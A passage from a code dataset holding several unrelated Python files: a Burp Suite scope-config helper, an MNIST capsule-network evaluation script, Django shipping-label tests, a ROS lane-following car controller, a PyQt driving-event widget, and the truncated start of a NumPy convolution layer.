Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nfrom urlparse import urlparse\n\nimport re\nimport json\n\nclass GraphWaveConfig:\n \"\"\"The GraphWave config contains dicts that can be used or loaded into Burp Suite.\n\n Attributes:\n data dict(obj): A Burp Suite JSON dict that can be imported into Burp Suite.\n includeList list(str): A list with unique code flow URLs.\n excludeList list(str): A list with similar code flow URLs.\n\n \"\"\"\n\n data = {}\n\n includeList = []\n\n excludeList = []\n\n def __init__(self, callbacks):\n \"\"\"Initiate the config by resetting to a clean state.\n\n Args:\n callbacks (obj): The Burp Suite callbacks (a Java Jython class).\n\n \"\"\"\n\n self.callbacks = callbacks\n self.reset()\n\n def reset(self):\n \"\"\"Reset the config to a clean state.\"\"\"\n\n # Load the current Burp Suite config and tweak it for GraphWave use.\n self.data = json.loads(self.callbacks.saveConfigAsJson(\"target.scope\"))\n self.data[\"target\"][\"scope\"][\"advanced_mode\"] = True\n self.data[\"target\"][\"scope\"][\"exclude\"] = []\n del self.data[\"target\"][\"scope\"][\"include\"]\n\n # Reset the include and exclude list.\n self.includeList = []\n self.excludeList = []\n\n def generateExcludeObject(self, url):\n \"\"\"Generate an exclude object from an URL so it can be loaded into the\n 'advanced scope control' 
option from Burp Suite.\n\n Args:\n url (str): The URL that should be converted to a Burp Suite scope control object.\n\n Returns:\n obj: The Burp Suite scope control object for this specific URL.\n\n \"\"\"\n\n parsed = urlparse(url)\n\n port = parsed.port if parsed.port else \"\"\n\n query = \"?\" + parsed.query if parsed.query else \"\"\n file = re.escape(parsed.path + query)\n\n return {\n \"enabled\": True,\n \"file\": \"^\" + file + \"$\",\n \"host\": \"^\" + re.escape(parsed.netloc.split(':')[0]) + \"$\",\n \"port\": \"^\" + str(port) + \"$\",\n \"protocol\": parsed.scheme\n }\n\n def include(self, url):\n \"\"\"Add a specific URL to the include list. The include list can be\n exported to a TXT file by the user.\n\n Args:\n url (str): The URL that should be included.\n\n \"\"\"\n\n if url not in self.includeList:\n self.includeList.append(url)\n\n def exclude(self, url):\n \"\"\"Add a specific URL to the exclude list. The exclude list can be\n exported to a TXT file or be marked out of scope by the user.\n\n Args:\n url (str): The URL that should be excluded.\n\n \"\"\"\n\n if url not in self.excludeList:\n self.excludeList.append(url)\n\n self.data[\"target\"][\"scope\"][\"exclude\"].append(\n self.generateExcludeObject(url)\n )\n","sub_path":"extension/GraphWaveConfig.py","file_name":"GraphWaveConfig.py","file_ext":"py","file_size_in_byte":3972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"568101081","text":"import os\nfrom functools import partial\n\nimport torch\nfrom keras.utils import to_categorical\nfrom torchvision.transforms import transforms\nimport torch.utils.data as Data\nimport numpy as np\nfrom PIL import Image\nfrom tqdm import tqdm\n\nfrom few_shot.capsule_network.capsule_tst_predict import ConvCapsule, device\nfrom torchvision import datasets\n\nnp.random.seed(123)\ndef main():\n root = os.path.dirname(__file__) + '/data'\n\n x_trans = transforms.Compose([transforms.ToTensor(), 
transforms.Normalize((0.1307,), (0.3081,))])\n y_trans = partial(to_categorical, num_classes=10)\n\n # 重构dataset\n x_test, y_test = torch.load(os.path.join(root, 'processed', 'test.pt'))\n x_test, y_test = x_test.numpy(), y_test.numpy()\n\n y_test_oh = y_trans(y_test)\n\n\n idx = list(range(len(y_test_oh)))\n np.random.shuffle(idx)\n X_test = np.concatenate([x_test, x_test[idx]], 1)\n Y_test = np.vstack([y_test_oh.argmax(1), y_test_oh[idx].argmax(1)]).T\n\n not_equal = Y_test[:, 0] != Y_test[:, 1]\n\n y_test_oh = y_test_oh[not_equal]\n y_test_upt = y_test[not_equal]\n X_test = X_test[not_equal]\n Y_test = Y_test[not_equal]\n Y_test.sort(axis=1)\n\n X_test = np.array([x_trans(Image.fromarray(X_test[i], mode='L')).numpy() for i in range(len(X_test))])\n\n testsets = Data.TensorDataset(torch.tensor(X_test), torch.tensor(y_test_oh))\n test_loader = Data.DataLoader(\n dataset=testsets,\n batch_size=128,\n shuffle=False\n )\n\n model = ConvCapsule()\n model.to(device)\n\n model.load_state_dict(torch.load(os.path.dirname(__file__) + '/model_dir/caps_model.pt',\n map_location='cpu' if not torch.cuda.is_available() else None))\n\n with torch.no_grad():\n model.eval()\n test_pred_list = []\n for x, y_oh in tqdm(test_loader):\n x, y_oh = x.to(device), y_oh.to(device)\n\n _, test_pred = model(x, y_oh)\n test_pred_list.extend(test_pred.numpy())\n\n greater = np.sort(np.array(test_pred_list), axis=1)[:, -2] > 0.5\n test_preds = np.array(test_pred_list).argsort()[:, -2:]\n test_preds.sort(axis=1)\n\n acc = 1.*(np.prod(test_preds == Y_test, axis=1)).sum()/len(X_test)\n print(u'CNN+Capsule,不考虑置信度的准确率为:%s' % acc)\n acc = 1.*(np.prod(test_preds == Y_test, axis=1)*greater).sum()/len(X_test)\n print(u'CNN+Capsule,考虑置信度的准确率为:%s' % acc)\n\n # testsets = Data.TensorDataset(torch.tensor(x_test),\n # torch.tensor(y_test))\n # test_loader = Data.DataLoader(\n # dataset=testsets,\n # batch_size=128,\n # shuffle=False\n # )\n #\n # test_pred_list = []\n # total_test_acc = 0\n #\n # with 
torch.no_grad():\n # model.eval()\n # for data, target in tqdm(test_loader):\n # data, target = data.to(device), target.to(device)\n # _, test_pred = model(data, target)\n #\n # test_pred_list.extend(test_pred.numpy())\n #\n # total_test_acc += len(np.where(np.argmax(target, 1) == np.argmax(test_pred, 1))[0])\n #\n # # 方法1\n # total_test_acc_rate = total_test_acc/len(x_test)\n # print(f'方法1 acc: {total_test_acc_rate}')\n #\n # # 方法2\n # test_preds = np.array(test_pred_list).argsort()[:, -1]\n # acc = 1. * (test_preds == np.argmax(y_test, 1)).sum() / len(x_test)\n # print(f'方法2 acc: {acc}')\n #\n #\n #\n #\n #\n # test_set = datasets.MNIST(root=root, train=False, transform=x_trans, download=False)\n #\n # test_loader = torch.utils.data.DataLoader(\n # dataset=test_set,\n # batch_size=128,\n # shuffle=False)\n #\n # total_test_loss = 0\n # total_test_acc = 0\n # with torch.no_grad():\n # model.eval()\n #\n # for data, target in tqdm(test_loader):\n # data = data.to(device)\n # new_target = torch.from_numpy(to_categorical(target.numpy(), 10)).to(device)\n # test_loss, test_pred = model(data, new_target)\n # total_test_loss += test_loss.item()\n #\n # total_test_acc += len(np.where(target == np.argmax(test_pred.cpu(), axis=1))[0])\n #\n # total_test_acc_rate = total_test_acc/len(test_loader.dataset)\n # print(f'test acc: {total_test_acc_rate}')\n #\n # print('Done')\n\n\n # build DataLoader\n\n\n\n # load model\n # predict\n\n\nif __name__ == '__main__':\n main()","sub_path":"few_shot/capsule_network/capsule_tst_predict_2.py","file_name":"capsule_tst_predict_2.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"648523088","text":"from datetime import datetime\n\nfrom django.test import TestCase\n\nfrom .models import ShippingLabel\nfrom .service.constants.service_codes import *\n\nfrom django.contrib.auth.models import User\nfrom apps.common.models import Address\nfrom 
apps.customers.models import Customer\nfrom apps.externals.models import Brand\nfrom apps.sales.models import Cart, CartedOffer, SalesOrder, Parcel, SentProduct\nfrom apps.spod.models import Sku, Product, Offer\n\n\nclass ShippingLabelTests(TestCase):\n\n def setUp(self):\n user = User.objects.create_user('some user', '', 'password', first_name='some', last_name='user')\n\n customer = Customer(user_profile=user)\n customer.save()\n\n address = Address(\n street1='213 N Racine',\n city='Chicago',\n state='IL',\n postal_code='60642'\n )\n address.save()\n customer.shipping_addresses.add(address)\n\n brand = Brand(name='some brand')\n brand.save()\n\n sku_under = Sku(\n number=123,\n name='some sku',\n brand=brand,\n weight=10\n )\n sku_under.save()\n\n product_under = Product(\n sku=sku_under,\n skus_per=1\n )\n product_under.save()\n\n offer_under = Offer(\n title='some title',\n price=10.99\n )\n offer_under.save()\n offer_under.products.add(product_under)\n\n cart_under = Cart(\n customer=customer\n )\n cart_under.save()\n\n carted_offer_under = CartedOffer(\n cart=cart_under,\n offer=offer_under,\n quantity=1\n )\n carted_offer_under.save()\n\n sales_order_under = SalesOrder(\n cart=cart_under,\n shipping=0,\n tax=0\n )\n sales_order_under.save()\n\n self.parcel_under = Parcel(\n sales_order=sales_order_under,\n sent_on=datetime.now()\n )\n self.parcel_under.save()\n\n sent_prod = SentProduct(\n parcel=self.parcel_under,\n product=product_under,\n quantity=1\n )\n sent_prod.save()\n\n sku_over = Sku(\n number=124,\n name='some sku',\n brand=brand,\n weight=20\n )\n sku_over.save()\n\n product_over = Product(\n sku=sku_over,\n skus_per=1\n )\n product_over.save()\n\n offer_over = Offer(\n title='some title over a pound',\n price=10.99\n )\n offer_over.save()\n offer_over.products.add(product_over)\n\n cart_over = Cart(\n customer=customer\n )\n cart_over.save()\n\n carted_offer_over = CartedOffer(\n cart=cart_over,\n offer=offer_over,\n quantity=1\n )\n 
carted_offer_over.save()\n\n sales_order_over = SalesOrder(\n cart=cart_over,\n shipping=0,\n tax=0\n )\n sales_order_over.save()\n\n self.parcel_over = Parcel(\n sales_order=sales_order_over,\n sent_on=datetime.now()\n )\n self.parcel_over.save()\n\n sent_prod = SentProduct(\n parcel=self.parcel_over,\n product=product_over,\n quantity=1\n )\n sent_prod.save()\n\n def test_as_image(self):\n import os\n self.parcel_over.make_shipping_label(UPS_GROUND)\n sl = ShippingLabel.objects.filter(parcel=self.parcel_over)[0]\n sl.as_image('test.png')\n os.remove('test.png')\n\n def test_dhl_express_under_pound(self):\n self.parcel_under.make_shipping_label(DHL_EXPEDITED_UNDER_1_LB)\n sl = ShippingLabel.objects.filter(parcel=self.parcel_under)\n self.assertGreater(sl.count(), 0)\n\n def test_dhl_express_over_pound(self):\n self.parcel_over.make_shipping_label(DHL_EXPEDITED_OVER_1_LB)\n sl = ShippingLabel.objects.filter(parcel=self.parcel_over)\n self.assertGreater(sl.count(), 0)\n\n def test_dhl_ground_under_pound(self):\n self.parcel_under.make_shipping_label(DHL_GROUND_UNDER_1_LB)\n sl = ShippingLabel.objects.filter(parcel=self.parcel_under)\n self.assertGreater(sl.count(), 0)\n\n def test_dhl_ground_over_pound(self):\n self.parcel_over.make_shipping_label(DHL_GROUND_OVER_1_LB)\n sl = ShippingLabel.objects.filter(parcel=self.parcel_over)\n self.assertGreater(sl.count(), 0)\n\n def test_ups_ground(self):\n self.parcel_over.make_shipping_label(UPS_GROUND)\n sl = ShippingLabel.objects.filter(parcel=self.parcel_over)\n self.assertGreater(sl.count(), 0)\n","sub_path":"apps/abol/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"192430539","text":"#!/usr/bin/python3\n#---Import---#\n#---ROS\nimport rospy,sys,os\nfrom std_msgs.msg import Float32\nfrom sensor_msgs.msg import CompressedImage\nfrom BienBaoClasssifier import BienBaoClassifier\nimport 
time\nimport cv2\nimport numpy as np\nimport scipy.ndimage as sp\nfrom threading import Thread\nimport os\ntry:\n\tos.chdir(os.path.dirname(__file__))\t\n\tos.system('clear')\n\tprint(\"\\nWait for initial setup, please don't connect anything yet...\\n\")\n\tsys.path.remove('/opt/ros/lunar/lib/python2.7/dist-packages')\nexcept: pass\ndef print_ros(str_):\n rospy.loginfo(str_)\n\ndef nothing(x):\n pass\n\nclass Team500_CDS_ROS(object):\n def __init__(self, NameTeam='team500', drawImage=False, drawBird=False, limitSpeed=[0, 60], limitAngle=[-30, 30]):\n self.frame = None\n self.limitSpeed = limitSpeed\n self.limitAngle = limitAngle\n self.Speed = 0\n self.Angle = 0\n self.First_time = True\n self.dsize_cut = [0, 0]\n self.Topic_Image = NameTeam + '_image/compressed'\n self.Topic_Speed = NameTeam + '_speed'\n self.Topic_Angle = NameTeam + '_steerAngle'\n self.pub_Speed = None\n self.pub_Angle = None\n self.sub_Image = None\n self.Speed = 50\n self.drawBird = drawBird\n self.drawImage = drawImage\n self.draw_Top = 80\n self.draw_Bot = 77\n self.BienBao_delay_set = 10\n self.BienBao_flag = 2\n self.BienBao_delay = 0\n self.Goc = 30\n self.draw_TopCenter = 25\n self.draw_BotCenter = 160\n self.BirdA = []\n self.Label_bienbao = ['Re Trai', 'Re Phai']\n self.On_Play = False\n self.Continue = True\n self.Trai = None\n self.Phai = None\n self.Thang = None\n self.Thang_flag = 0\n self.Control = 0\n self.draw_Lane()\n self.run()\n\n def draw_Lane(self):\n h, w = [240, 320]\n Trai = np.array( [[[0, h//4],[w//2,h//4],[(w//4)*3,h//2],[(w//4)*3,h],[0,h]]], dtype=np.int32)\n self.Trai = cv2.fillPoly( np.zeros([240,320],dtype=np.uint8), Trai, 255 )\n Phai = np.array( [[[w, h//4],[w//2,h//4],[w//4,h//2],[w//4,h],[w,h]]], dtype=np.int32)\n self.Phai = cv2.fillPoly( np.zeros([240,320],dtype=np.uint8), Phai, 255 )\n Thang = np.array( [[[w//4, 0],[(w//4)*3,0],[(w//4)*3,h],[w//4,h]]], dtype=np.int32)\n self.Thang = cv2.fillPoly( np.zeros([240,320],dtype=np.uint8), Thang, 255 )\n\n def 
RoadDetect(self, image, Low=[30, 8, 69], High=[66, 35, 99]):\n h, w = image.shape[:2]\n # shadow = self.Shadow(image)\n # LineWhite = self.LineWhite(image)\n # HSV = cv2.cvtColor(image[h - 80:h, w // 2 - 90:w // 2 + 90, :], cv2.COLOR_BGR2HSV)\n # H = HSV[..., 0]\n # S = HSV[..., 1]\n # V = HSV[..., 2]\n Low_HSV = Low\n High_HSV = High\n image = cv2.inRange(cv2.cvtColor(image, cv2.COLOR_BGR2HSV), np.array(Low_HSV),\n np.array(High_HSV))\n # print_ros(self.Trai.dtype)\n # print_ros(self.Phai.dtype)\n # print_ros(self.BienBao_flag)\n if self.BienBao_flag == 0:\n image = cv2.bitwise_or(image, image, mask=self.Trai)\n elif self.BienBao_flag == 1:\n image = cv2.bitwise_or(image, image, mask=self.Phai)\n image, pts, K = self.Road_Find(image)\n return image, pts, K\n\n def Road_Find(self, img, winsize=9, margin=150, minpix=1500):\n h, w = img.shape[:2]\n histogram = np.sum(img[2 * (h // 3):, w // 2 - 30: w // 2 + 30], axis=0)\n F_img = cv2.merge((img, img, img))\n mid_Road = int(np.mean(np.where(histogram == np.max(histogram)))) + w // 2 - 30\n\n win_heigh = np.int(h / winsize)\n\n nonzero_y, nonzero_x = img.nonzero()\n F = np.zeros_like(img)\n mid_x = mid_Road\n mid_road = []\n KKKK = 0\n for win in range(winsize):\n win_y_low = h - (win + 1) * win_heigh\n win_y_high = h - win * win_heigh\n win_x_low = mid_x - margin\n win_x_high = mid_x + margin\n cv2.rectangle(F_img, (win_x_high, win_y_high), (win_x_low, win_y_low), (255, 0, 0), 2)\n\n mid_x_good = ((nonzero_x >= win_x_low) & (nonzero_x < win_x_high)\n & (nonzero_y >= win_y_low) & (nonzero_y < win_y_high)).nonzero()[0]\n if len(mid_x_good) > minpix:\n mid_x = np.int(np.mean(nonzero_x[mid_x_good]))\n KKKK += 1\n mid_road.append(mid_x_good)\n mid_road = np.concatenate(mid_road)\n #\n mid_x_road, mid_y_road = nonzero_x[mid_road], nonzero_y[mid_road]\n x_fit_plot = np.linspace(0, h - 1, h)\n if len(mid_x_road) > 0:\n mid_fit = np.polyfit(mid_y_road, mid_x_road, 2)\n mid_fit_plot = mid_fit[0] * x_fit_plot ** 2 + mid_fit[1] * 
x_fit_plot + mid_fit[2]\n if self.drawImage:\n for i, mid in enumerate(mid_fit_plot):\n cv2.circle(F_img, (int(mid), i), 1, (255, 0, 0), -1)\n # print(len(mid_fit_plot))\n return F_img, mid_fit_plot, KKKK\n\n def BirdEye(self, img):\n h, w = img.shape[:2]\n self.BirdA = [(w // 2 + self.draw_BotCenter, h - self.draw_Bot),\n (w // 2 - self.draw_BotCenter, h - self.draw_Bot),\n (w // 2 - self.draw_TopCenter, self.draw_Top),\n (w // 2 + self.draw_TopCenter, self.draw_Top)]\n src = np.float32(self.BirdA)\n dst = np.float32([[w, h], [0, h], [0, 0], [w, 0]])\n M = cv2.getPerspectiveTransform(src, dst)\n N = cv2.getPerspectiveTransform(dst, src)\n F = cv2.warpPerspective(img, M, (w, h), flags=cv2.INTER_LINEAR)\n return F, M, N\n\n def run(self):\n self.pub_Speed = rospy.Publisher(self.Topic_Speed, Float32, queue_size=10)\n self.pub_Angle = rospy.Publisher(self.Topic_Angle, Float32, queue_size=10)\n self.sub_Image = rospy.Subscriber(self.Topic_Image, CompressedImage, self.get_image)\n rospy.init_node('talker', anonymous=True)\n print_ros(\"Team 500 Let's Go!!!\")\n\n self.On_Play = True\n self.BienBaoClassifier = BienBaoClassifier()\n rospy.spin()\n\n def Core_thread(self):\n while self.On_Play:\n if self.Continue & (not self.frame is None):\n try:\n image__ = self.frame.copy()\n image = self.BirdEye(image__)[0]\n image, pts, K = self.RoadDetect(image)\n if self.On_Play:\n self.Publish_Angle(self.AxisControl(pts, K))\n self.Publish_Speed(self.Speed)\n else:\n self.Publish_Speed(0)\n cv2.imshow('Team500_DUT ETE', image)\n if cv2.waitKey(1) == 27:\n self.On_Play = False\n print_ros('Turn OFF')\n except BaseException as be:\n print_ros('{}'.format(be))\n\n\n def BienBao_thread(self):\n print_ros('Thread_Online')\n self.Continue = False\n self.BienBaoClassifier = BienBaoClassifier()\n self.Continue = True\n while self.On_Play:\n if not self.frame is None:\n try:\n self.Goc = 30\n self.Speed = 50\n self.BienBao_flag, self.BienBao_VT = self.BienBao(self.frame)\n if 
self.BienBao_flag in [0,1]:\n self.Goc = 45\n self.Speed = 40\n self.Thang_flag = False\n time.sleep(2)\n except BaseException as be:\n print_ros('{}'.format(be))\n # time.sleep(1)\n print_ros('Thread OFF')\n\n def BienBao(self, image):\n image_ = cv2.inRange(cv2.cvtColor(image, cv2.COLOR_BGR2HSV), (0, 150, 100), (255, 255, 255))\n image_ = cv2.erode(image_, None, iterations=1)\n image_ = cv2.dilate(image_, None, iterations=2)\n ret, labels = cv2.connectedComponents(image_)\n B = 2\n for r in range(ret):\n y, x = np.where(labels == r)\n if (x.shape[0] > 200) & (image_[y[0], x[0]] != 0):\n image_cut = image[np.min(y):np.max(y), np.min(x):np.max(x),:]\n h, w = image_cut.shape[:2]\n if (0.8 <= h/w <= 1.2) & (0.8 <= w/h <= 1.2):\n B = self.BienBaoClassifier.detect(image[np.min(y):np.max(y), np.min(x):np.max(x), :])\n if B in [0, 1]:\n print_ros('Result: {}'.format(self.Label_bienbao[B]))\n # if self.drawImage:\n # image = cv2.rectangle(image, (np.min(x), np.min(y)), (np.max(x), np.max(y)), (0, 0, 255), 2)\n # image = cv2.putText(image, self.Label_bienbao[B],(np.min(x), np.min(y)),cv2.FONT_HERSHEY_COMPLEX_SMALL, 0.7, (0, 255, 255))\n # self.First_time = False\n return B, ((np.min(x), np.min(y)), (np.max(x), np.max(y)))\n\n def AxisControl(self, pts, K, top=60, thresh=1):\n # print(pts)\n AxisLine = sp.filters.gaussian_filter1d(pts, 0.5)\n # print(AxisLine)\n if self.BienBao_flag in [0, 1]:\n Control = ((AxisLine[240-top] - 360//2)/180)*self.Goc\n self.Thang_flag = 0\n else:\n if (K < 4) & (self.Thang_flag > 20):\n self.Thang_flag = 0\n Control = self.Control\n else:\n self.Thang_flag += 1\n Control = ((AxisLine[240-top] - 360//2)/180)*self.Goc\n # if self.BienBao_flag in [0, 1] & self.BienBao_delay<=self.BienBao_delay_set:\n # self.BienBao_delay += 1\n # if self.Bien\n # Control = -abs(Control) - 10\n # else:\n # self.BienBao_delay = 0\n # print(Control)\n if Control > thresh:\n Control -= thresh\n Text = \"Turn Right: %d\" % Control\n elif Control < -thresh:\n Control 
+= thresh\n Text = \"Turn Left: %d\" % abs(Control)\n else:\n Control = 0\n Text = \"Go On\"\n self.Control = Control\n print_ros(Text)\n return Control\n\n def get_image(self, data):\n try:\n if self.First_time:\n self.First_time=False\n Thread(target=self.BienBao_thread).start()\n Thread(target=self.Core_thread).start()\n self.Continue = True\n Array_JPG = np.fromstring(data.data, np.uint8)\n cv_image = cv2.imdecode(Array_JPG, cv2.IMREAD_COLOR)\n self.frame = cv_image\n except BaseException as be:\n print_ros('{}'.format(be))\n self.Continue = True\n\n def Publish_Speed(self, speed):\n speed = min(self.limitSpeed[1], speed)\n speed = max(self.limitSpeed[0], speed)\n self.Speed = speed\n self.pub_Speed.publish(float(speed))\n\n def Publish_Angle(self, angle):\n angle = min(self.limitAngle[1], angle)\n angle = max(self.limitAngle[0], angle)\n self.Angle = angle\n self.pub_Angle.publish(float(angle))\n\n\nif __name__ == '__main__':\n Team500_CDS_ROS(NameTeam='team500', drawImage=True)\n","sub_path":"File/team500/scripts/main_team500.py","file_name":"main_team500.py","file_ext":"py","file_size_in_byte":11277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"184052045","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nimport numpy as np\nimport pandas as pd\nimport config_data as c\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom event_thread import EventThread, TaskType\nfrom event_identification import EventType\nimport images\n\n\nclass EventWidget(QtWidgets.QWidget):\n\n setPositionSignal = QtCore.pyqtSignal(float, name='setPositionSignal')\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.tripData = None\n self.resultItems = []\n self.eventThread = EventThread()\n self.eventThread.resultReady.connect(self.ShowEvents)\n self.SetupUI()\n\n def SetupUI(self):\n # table\n self.table = QtWidgets.QTableWidget()\n self.table.setColumnCount(6)\n 
self.table.setHorizontalHeaderLabels('EventId Type Time Video Chart Para'.split())\n self.table.verticalHeader().setHidden(True)\n header = self.table.horizontalHeader()\n font = header.font()\n font.setBold(True)\n header.setFont(font)\n self.table.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)\n\n # other component\n hlayout = QtWidgets.QHBoxLayout()\n self.buttonGroup = QtWidgets.QButtonGroup()\n self.buttonGroup.setExclusive(False)\n self.buttonGroup.buttonToggled[QtWidgets.QAbstractButton, bool].connect(self.CheckBoxClicked)\n # add 'All' button\n self.allbtn = QtWidgets.QCheckBox('All')\n self.allbtn.setChecked(True)\n self.allbtn.clicked.connect(self.AllBtnClicked)\n startBtn = QtWidgets.QCheckBox('Start')\n startBtn.setChecked(True)\n stopbtn = QtWidgets.QCheckBox('Stop')\n stopbtn.setChecked(True)\n # self.buttonGroup.addButton(allbtn)\n self.buttonGroup.addButton(startBtn)\n self.buttonGroup.addButton(stopbtn)\n hlayout.addWidget(self.allbtn)\n hlayout.addWidget(startBtn)\n hlayout.addWidget(stopbtn)\n # add other button for all types\n for i in TaskType:\n if i == TaskType.StartStop:\n continue\n checkBox = QtWidgets.QCheckBox(i.name)\n checkBox.setChecked(True)\n self.buttonGroup.addButton(checkBox)\n hlayout.addWidget(checkBox)\n \n self.configBtn = QtWidgets.QPushButton(QtGui.QIcon(\":/img/configuration\"), 'config')\n self.updateBtn = QtWidgets.QPushButton(QtGui.QIcon(\":/img/updating\"), 'update')\n\n # layout\n hlayout.addWidget(self.configBtn)\n hlayout.addWidget(self.updateBtn)\n\n vlayout = QtWidgets.QVBoxLayout()\n vlayout.addWidget(self.table)\n vlayout.addLayout(hlayout)\n self.setLayout(vlayout)\n\n def UpdateTripData(self, data):\n self.tripData = data\n self.UpdateEvents()\n\n def UpdateEvents(self):\n # start the thread\n if not self.eventThread.isRunning():\n self.eventThread.start()\n # clear the origin contens\n self.table.clearContents()\n self.table.setRowCount(0)\n # prepare for search\n self.resultItems.clear()\n 
self.searchItems = self.CheckSelectedItem()\n self.recvSet = set()\n\n self.eventThread.AddTasks(self.tripData, self.searchItems)\n\n def CheckSelectedItem(self):\n ''' 从配置文件加载需要检测的事件 '''\n items = []\n allcfg = [c.StartStop, c.HardBrake, c.HardSwerve, c.LaneChange, c.CutIn, c.CarFollowing, c.PhoneEvent, c.FatigueDriving]\n alltype = [TaskType.StartStop, TaskType.HardBrake, TaskType.HardSwerve, TaskType.LaneChange, TaskType.CutIn,\n TaskType.CarFollowing, TaskType.PhoneEvent, TaskType.FatigueDriving]\n for i, val in enumerate(allcfg):\n if val:\n items.append(alltype[i])\n return items\n\n def ShowEvents(self, task: TaskType, items):\n self.recvSet.add(task)\n self.resultItems.extend(items)\n # wait all task returned\n if len(self.recvSet) == len(self.searchItems):\n # exit the thread when all task returned\n self.eventThread.Stop()\n # sorted by timestamp\n self.resultItems.sort(key=lambda x: x[1])\n # show event\n cameraIcon = QtGui.QIcon(':/img/camera-simple')\n chartIcon = QtGui.QIcon(':/img/chart')\n for item in self.resultItems:\n row = self.table.rowCount()\n self.table.insertRow(row)\n\n eventIdItem = QtWidgets.QTableWidgetItem(str(row + 1))\n typeItem = QtWidgets.QTableWidgetItem(item[0].name)\n\n t = item[1] // 10 # to s\n eventTimeStr = \"%.2d:%.2d:%.2d\" % (t // 3600, t % 3600 // 60, t % 3600 % 60)\n timeItem = QtWidgets.QTableWidgetItem(eventTimeStr)\n\n videoBtn = QtWidgets.QPushButton(cameraIcon, 'Video')\n videoBtn.setLayoutDirection(QtCore.Qt.RightToLeft)\n videoBtn.setProperty('timestamp', item[1])\n videoBtn.clicked.connect(self.VideoBtnClicked)\n\n chartBtn = QtWidgets.QPushButton(chartIcon, 'Charts')\n chartBtn.setLayoutDirection(QtCore.Qt.RightToLeft)\n chartBtn.setProperty('timestamp', item[1])\n chartBtn.clicked.connect(self.ChartsBtnClicked)\n\n self.table.setItem(row, 0, eventIdItem)\n self.table.setItem(row, 1, typeItem)\n self.table.setItem(row, 2, timeItem)\n self.table.setCellWidget(row, 3, videoBtn)\n self.table.setCellWidget(row, 4, 
chartBtn)\n\n # QtWidgets.QApplication.processEvents()\n\n def VideoBtnClicked(self):\n obj = self.sender()\n timestamp = obj.property('timestamp')\n self.setPositionSignal.emit(timestamp)\n\n def ChartsBtnClicked(self):\n obj = self.sender()\n timestamp = obj.property('timestamp')\n print(timestamp)\n \n def CheckBoxClicked(self, btn, checked):\n items = self.table.findItems(btn.text(), QtCore.Qt.MatchContains)\n for item in items:\n self.table.setRowHidden(item.row(), not checked)\n if not checked:\n self.allbtn.setChecked(False)\n\n def AllBtnClicked(self, checked):\n for btn in self.buttonGroup.buttons():\n btn.setChecked(checked)\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n tripData = pd.read_csv('D:\\\\TongJi\\\\NatureDriving\\\\data\\\\359932\\\\File_ID_359932.csv', encoding='utf-8')\n\n # data handle : fill and transform\n\n fieldList = [c.SpeedField, c.AccelXField, c.AccelYField, c.AccelZField,\n c.LaneWidthField, c.LaneOffsetField, c.LeftLaneField, c.RightLaneField,\n c.T0_ObjectID, c.T0_XRange, c.T0_YRange,\n c.T0_ObjectID.replace('0', '1'), c.T0_XRange.replace('0', '1'), c.T0_YRange.replace('0', '1'),\n c.T0_ObjectID.replace('0', '2'), c.T0_XRange.replace('0', '2'), c.T0_YRange.replace('0', '2'),\n c.T0_ObjectID.replace('0', '3'), c.T0_XRange.replace('0', '3'), c.T0_YRange.replace('0', '3')]\n tripData[fieldList] = tripData[fieldList].fillna(method='pad')\n tripData[fieldList] = tripData[fieldList].fillna(0)\n tripData[c.SpeedField] = tripData[c.SpeedField] * 3.6\n mm2mList = [c.LaneWidthField, c.LaneOffsetField, c.LeftLaneField, c.RightLaneField]\n tripData[mm2mList] = tripData[mm2mList] / 1000\n\n win = EventWidget()\n win.UpdateTripData(tripData)\n win.resize(800, 800)\n win.show()\n\n sys.exit(app.exec())\n","sub_path":"event_widget.py","file_name":"event_widget.py","file_ext":"py","file_size_in_byte":7576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 
+{"seq_id":"547336187","text":"import mnist\nimport numpy as np\n'''\n卷积神经网络里的卷积在计算机视觉里是“相关”操作\n填充是为了输入和输出有相同的尺寸\n如果不进行填充(padding)操作,就是称为“有效”填充\nMINIST CNN\n每张图像是28*28,使用3*3的过滤器,一共8个过滤器,输出26*26*8\n'''\n\n\nclass Conv3x3:\n # A Convolution layer using 3x3 filters\n def __init__(self, num_filters):\n self.num_filters = num_filters\n # filters is a 3d array with dimensions (num_filters ,3, 3)\n # we divide by 9 to reduce the variance of our initial values\n self.filters = np.random.rand(num_filters, 3, 3) / 9\n\n def iterate_regions(self, image: np.ndarray):\n '''\n Generates all possible 3x3 image regions using valid padding\n image is a 2d numpy array\n :param image:\n :return:\n '''\n h, w = image.shape # minist 28*28\n for i in range(h-2):\n for j in range(w-2):\n im_region = image[i:(i + 3), j:(j + 3)]\n yield im_region, i, j\n # 返回图像上的一个3*3的区域和它最左上的坐标\n\n def forward(self, input: np.ndarray):\n '''\n performs a forward pass of the conv layer using the given input\n return a 3d numpy array with dimensions (h, w, num_filters)\n input is a 2d numpy array\n :param input:\n :return:\n '''\n h, w = input.shape # 28*28\n\n # 